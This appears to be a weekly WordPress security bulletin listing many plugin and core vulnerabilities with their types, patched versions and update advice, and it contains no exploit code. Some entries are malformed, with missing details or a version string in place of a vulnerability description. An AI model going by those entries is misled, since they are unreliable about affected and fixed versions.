Watch Out Wednesday – January 24, 2024

Home » Watch Out Wednesday – January 24, 2024

Understanding Vulnerabilities in WordPress Plugins

Every week, we highlight known vulnerabilities in WordPress plugins. This information helps you stay informed about potential risks and take appropriate action to protect your website. By addressing these vulnerabilities, you ensure the safety and integrity of your WordPress site and its data.

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.38
Recommended Action: Update to version 1.38, or a newer patched version

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: Cross-Site Request Forgery in new_voucher_template.php
Patched Version: 4.3.6
Recommended Action: Update to version 4.3.6, or a newer patched version

Plugin: MOLIE – Instructure Canvas Linking tool

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Socializer – Simple & Easy Social Media Share Icons

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.3
Recommended Action: Update to version 7.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 4.3.1
Recommended Action: Update to version 4.3.1, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass to Private Message Disclosure
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: User Activity Log

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: WidgetShortcode

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.24.4
Recommended Action: Update to version 1.24.4, or a newer patched version

Plugin: Backup Migration

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Live Scores for SportsPress

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Header Footer Code Manager

Vulnerability: Authenticated SQL Injections
Patched Version: 1.1.14
Recommended Action: Update to version 1.1.14, or a newer patched version

Plugin: kk Star Ratings – Rate Post & Collect User Feedbacks

Vulnerability: Race Condition to Multiple User Voting
Patched Version: 5.4.6
Recommended Action: Update to version 5.4.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Authenticated (Admin+) Remote Code Execution on Multi-Site
Patched Version: 2.80.8
Recommended Action: Update to version 2.80.8, or a newer patched version

Plugin: WP-Contact

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Slider

Vulnerability: Subscriber+ SQL Injection
Patched Version: 1.1.121
Recommended Action: Update to version 1.1.121, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Password Hash Extraction
Patched Version: 0.9.2.5
Recommended Action: Update to version 0.9.2.5, or a newer patched version

Plugin: Spiffy Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.9.2
Recommended Action: Update to version 4.9.2, or a newer patched version

Plugin: Edit Comments XT

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Booking Calendar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: iPanorama 360 – Advanced Virtual Tour Builder

Vulnerability: Authenticated (Admin+) SQL injection
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Catch Themes Demo Import

Vulnerability: Arbitrary File Upload
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Timely All-in-One Events Calendar

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Titan Framework

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Cross-Linker

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: SearchWP Premium

Vulnerability: Authenticated (Subscriber+) Nonce Leakage and Authorization Bypass
Patched Version: 4.2.6
Recommended Action: Update to version 4.2.6, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Unauthorized Profile Modification
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.5
Recommended Action: Update to version 6.0.5, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Cross-Site Scripting via p_name parameter
Patched Version: 1.5.63
Recommended Action: Update to version 1.5.63, or a newer patched version

Plugin: LightStart – Maintenance Mode, Coming Soon and Landing Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Missing Authorization to Product Creation/Modification
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Woocommerce Tabs Plugin, Add Custom Product Tabs

Plugin: WP-ContactForm

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.7.1.1
Recommended Action: Update to version 2.7.1.1, or a newer patched version

Plugin: WF Cookie Consent

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Math Comment Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Blaze Slideshow

Vulnerability: Arbitrary File upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.33
Recommended Action: Update to version 1.2.33, or a newer patched version

Plugin: Facebook for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.15
Recommended Action: Update to version 1.9.15, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: BlogVault WordPress Backup Plugin – Migration, Staging, and Backups

Vulnerability: 1.44
Patched Version: 1.45
Recommended Action: Update to version 1.45, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection via WP_Meta_Query
Patched Version: 4.1.34
Recommended Action: Update to one of the following versions, or a newer patched version: 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Easy Digital Downloads – Simple Shipping

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Sitekit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘sitekit_iframe’ shortcode
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Free counter

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: VK Filter Search

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.36
Patched Version: 2.3.37
Recommended Action: Update to version 2.3.37, or a newer patched version

Plugin: Visual Link Preview

Vulnerability: Unauthorised AJAX Calls
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Cross-Site Request Forgery via multiple functions
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Booking Ultra Pro Appointments Booking Calendar Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Restaurant Menu – Food Ordering System – Table Reservation

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PDQ CSV

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Spreadsheet Integration – Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table.

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Subscribe To Comments Reloaded

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 140219
Recommended Action: Update to version 140219, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Local File Inclusion
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: Leyka

Vulnerability: Privilege Escalation via Admin Password Reset
Patched Version: 3.30.3
Recommended Action: Update to version 3.30.3, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.5.3.2
Recommended Action: Update to version 1.5.3.2, or a newer patched version

Plugin: Category Post List Widget

Vulnerability: Unauthenticated Stored Cross-Site Scripting via custom_css
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: The Awesome Feed – Custom Feed

Plugin: Smash Balloon Social Post Feed – Simple Social Feeds for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Event Monster – Event Management, Tickets Booking, Upcoming Event

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.1.14
Recommended Action: Update to version 3.5.1.14, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Missing Authorization on Various AJAX Actions
Patched Version: 7.8
Recommended Action: Update to version 7.8, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Arbitrary User Password Reset to Privilege Escalation
Patched Version: 7.5.5
Recommended Action: Update to version 7.5.5, or a newer patched version

Plugin: Bloom Email Opt-In

Vulnerability: Privilege Escalation
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Ideal Interactive Map

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easing Slider

Vulnerability: Cross-Site Scripting
Patched Version: 2.2.0.7
Recommended Action: Update to version 2.2.0.7, or a newer patched version

Plugin: MemberPress Downloads

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Recipe Cards For Your Food Blog from Zip Recipes

Vulnerability: Authenticated(Contributor+) SQL Injection
Patched Version: 8.1.1
Recommended Action: Update to version 8.1.1, or a newer patched version

Plugin: JM Twitter Cards

Vulnerability: Full Path Disclosure
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Ruven Toolkit

Plugin: IP Blacklist Cloud

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooDiscuz – WooCommerce Comments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Companion Sitemap Generator – HTML & XML

Vulnerability: Cross-Site Request Forgery and Local File Inclusion
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce

Vulnerability: Stored Cross Site Scripting
Patched Version: 3.1.28
Recommended Action: Update to version 3.1.28, or a newer patched version

Plugin: Simple Custom CSS and JS

Vulnerability: Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Dynamics 365 Integration

Vulnerability: Missing Authorization via init
Patched Version: 1.3.14
Recommended Action: Update to version 1.3.14, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to Information Exposure
Patched Version: 5.0.4
Recommended Action: Update to version 5.0.4, or a newer patched version

Plugin: WPForms Pro

Vulnerability: CSV Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Image vertical reel scroll slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Clipr

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Admin Language Change

Vulnerability: Authorization Bypass
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Product Input Fields for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Authenticated Arbitrary File Upload
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.7.25
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.25, 3.8.25, 3.9.23, 4.0.22, 4.1.22, 4.2.19, 4.3.15, 4.4.14, 4.5.13, 4.6.10, 4.7.9, 4.8.5, 4.9.2

Plugin: Safe SVG

Vulnerability: Denial of Service
Patched Version: 1.9.5
Recommended Action: Update to version 1.9.5, or a newer patched version

Plugin: Community by PeepSo – Download from PeepSo.com

Vulnerability: Privilege Escalation
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Mingle Forum

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: Indeed Membership Pro

Vulnerability: Remote Image File Inclusion
Patched Version: 7.6
Recommended Action: Update to version 7.6, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Reflected Cross-Site Scripting via ‘ays_pb_tab’ Parameter
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Plaintext Storage of Credentials
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Maspik – Advanced Spam Protection

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.7.9
Recommended Action: Update to version 0.7.9, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.2.18
Recommended Action: Update to version 3.2.18, or a newer patched version

Plugin: WpStream – Live Streaming, Video on Demand, Pay Per View

Vulnerability: Cross-Site Request Forgery via wpstream_settings
Patched Version: 4.4.10.6
Recommended Action: Update to version 4.4.10.6, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Missing Authorization to Unauthenticated Arbitrary Content Deletion
Patched Version: 7.6.1
Recommended Action: Update to version 7.6.1, or a newer patched version

Plugin: WordPress Leads

Vulnerability: Authorization Bypass
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WPAMS – Apartment Management System for wordpress

Vulnerability: Apartment Management System for wordpress Theme < 17-07-2019
Patched Version: 17-07-2019
Recommended Action: Update to version 17-07-2019, or a newer patched version

Plugin: Car Rental by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: SQL Injection
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: BJ Lazy Load

Vulnerability: Remote File Inclusion via TimThumb
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: YouSayToo auto-publishing plugin

Plugin: Contact Builder by Themify

Vulnerability: Email Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP phpMyAdmin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.0.4
Recommended Action: Update to version 5.2.0.4, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Contact Form 7 <= 1.3.3.2
Patched Version: 1.3.3.3
Recommended Action: Update to version 1.3.3.3, or a newer patched version

Plugin: Bubble Menu – Sticky Navigation with Floating Button Menu Solution

Vulnerability: Cross Site Request Forgery
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Core: WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7.39
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.39, 3.8.39, 3.9.37, 4.0.36, 4.1.36, 4.2.33, 4.3.29, 4.4.28, 4.5.27, 4.6.24, 4.7.24, 4.8.20, 4.9.21, 5.0.17, 5.1.14, 5.2.16, 5.3.13, 5.4.11, 5.5.10, 5.6.9, 5.7.7, 5.8.5, 5.9.4, 6.0.2

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_preload_single_save_settings_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: WP Reset – Most Advanced WordPress Reset Tool

Vulnerability: Authenticated Stored Cross-Site Scripting via extra_data Parameter
Patched Version: 1.90
Recommended Action: Update to version 1.90, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Plugin: WP Booklet

Vulnerability: Authenticated (Subscriber+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Rate Star Review Vote – AJAX Reviews, Votes, Star Ratings

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: TS Webfonts for さくらのレンタルサーバ

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.5
Recommended Action: Update to version 5.5.5, or a newer patched version

Plugin: Simple Ads Manager

Vulnerability: Unauthenticated PHP Objection Injection
Patched Version: 2.10.0.130
Recommended Action: Update to version 2.10.0.130, or a newer patched version

Plugin: Gallery – Video Gallery and YouTube Gallery

Vulnerability: Video Gallery and YouTube Gallery <= 2.0.3
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Comment Uploaded Image Filename
Patched Version: 7.6.12
Recommended Action: Update to version 7.6.12, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Server-Side Request Forgery
Patched Version: 8.7.4
Recommended Action: Update to version 8.7.4, or a newer patched version

Plugin: ChatBot Conversational Forms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Free Booking Plugin for Hotels, Restaurants and Car Rentals – eaSYNC Booking

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: Improper Access Control
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Subscriber+ Arbitrary File Creation/Upload/Deletion
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: MyBookTable Bookstore by Stormhill Media

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.4
Recommended Action: Update to version 3.3.4, or a newer patched version

Plugin: WPMobile.App — Android and iOS Mobile Application

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.21
Recommended Action: Update to version 11.21, or a newer patched version

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: PHP Object Injection
Patched Version: 6.9.4
Recommended Action: Update to version 6.9.4, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: Unauthenticated PHP Object Injection in prepare_unread_status
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Easy Contact Form Solution

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Property Hive

Vulnerability: Remote Code Execution
Patched Version: 1.4.26
Recommended Action: Update to version 1.4.26, or a newer patched version

Plugin: Updraft

Vulnerability: Reflected Cross-Site Scripting via ‘backup_timestamp’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: YouTube Playlist Player

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.6.8
Recommended Action: Update to version 4.6.8, or a newer patched version

Plugin: WooCommerce Easy Duplicate Product

Vulnerability: Missing Authorization via wedp_duplicate_product_action
Patched Version: 0.3.0.8
Recommended Action: Update to version 0.3.0.8, or a newer patched version

Plugin: Filr – Secure document library

Vulnerability: Missing Authorization
Patched Version: 1.2.2.1
Recommended Action: Update to version 1.2.2.1, or a newer patched version

Plugin: KP Fastest Tawk.to Chat

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: AS – Create Pinterest Pinboard Pages

Vulnerability: Authenticated Options Change to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Grid Portfolio – Photo Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: PhotoXhibit

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.4.6
Recommended Action: Update to version 4.4.6, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_activate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: WP Admin UI Customize

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 1.5.13
Recommended Action: Update to version 1.5.13, or a newer patched version

Plugin: WP Google Fonts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: ElasticPress

Vulnerability: Directory Traversal
Patched Version: 4.2.0
Recommended Action: Update to version 4.2.0, or a newer patched version

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 4.18.0
Recommended Action: Update to version 4.18.0, or a newer patched version

Plugin: OpenInviter for WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery via wp_ajax_powerpress_media_info
Patched Version: 11.0.7
Recommended Action: Update to version 11.0.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: WP GDPR

Vulnerability: Missing Authorization Checks
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Time Slots Booking Form

Vulnerability: Cross-Site Request Forgery to Feedback Submission
Patched Version: 1.1.77
Recommended Action: Update to version 1.1.77, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 8.9.6
Recommended Action: Update to version 8.9.6, or a newer patched version

Plugin: Credova Financial

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via imported form title
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: JivoChat Live Chat – WP live chat plugin for WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.5.4
Recommended Action: Update to version 1.3.5.4, or a newer patched version

Plugin: Read More Excerpt Link

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in admin_widgets_welcome function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Sensitive Information Exposure
Patched Version: 5.1.2
